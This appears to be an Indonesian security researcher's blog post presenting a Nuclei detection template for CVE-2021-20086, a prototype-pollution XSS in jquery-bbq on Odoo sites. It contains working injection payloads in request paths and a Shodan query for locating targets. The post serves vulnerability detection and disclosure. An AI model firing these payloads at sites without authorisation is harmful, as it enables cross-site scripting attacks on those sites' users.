Odoo Apps - XSS via Prototype Pollution

19 Agustus 2025, saya menyumbangkan Template CVE-2021-20086 untuk ProjectDiscovery (Nuclei Templates). 11 September 2025, Template CVE-2021-20086 sedang dalam proses peninjauan. 08 Oktober 2025, Template CVE-2021-20086 disetujui.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
id: CVE-2021-20086

info:
name: Odoo Apps - XSS via Prototype Pollution
author: 1337rokudenashi
severity: high
description: |
jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.
impact: |
Attackers can modify Object.prototype, leading to potential security issues like property overwrites and application behavior manipulation.
remediation: |
Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
reference:
- https://www.tenable.com/security/research/tra-2022-10
- https://nvd.nist.gov/vuln/detail/CVE-2021-20086
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-20086
cwe-id: CWE-1321
epss-score: 0.37071
epss-percentile: 0.96989
cpe: cpe:2.3:a:jquery-bbq_project:jquery-bbq:1.2.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jquery-bbq_project
product: jquery-bbq
shodan-query: html:"Odoo"
tags: cve,cve2021,odoo,xss,proto,jquery,vuln

http:
- method: GET
path:
- "{{BaseURL}}/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x"
- "{{BaseURL}}/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x"

stop-at-first-match: true

matchers:
- type: dsl
dsl:
- '!contains(body, "debug:")'
- 'contains_all(body, "alert(document.domain)","var odoo =")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100e2dbffb9c52bad53ff723a47e7b4c1534a787b7d782d2895659090b5a8ea108f022100a57f2961c9c7f0c9e89d204efc7c33d6ae71e1323a7855c0ce67ed5f1ccd486b:922c64590222798bb761d5b6d8e72950

Ini adalah bentuk kontribusi saya sebagai Security Researcher. Odoo Apps - XSS via Prototype Pollution (1337rokudenashi)


Odoo Apps - XSS via Prototype Pollution
https://1337rokudenashi.github.io/7a8b9c0d-1e2f-4f3b-8a7c-6d5e4f3a2b1c/
Author
1337rokudenashi
Posted on
August 19, 2025
Licensed under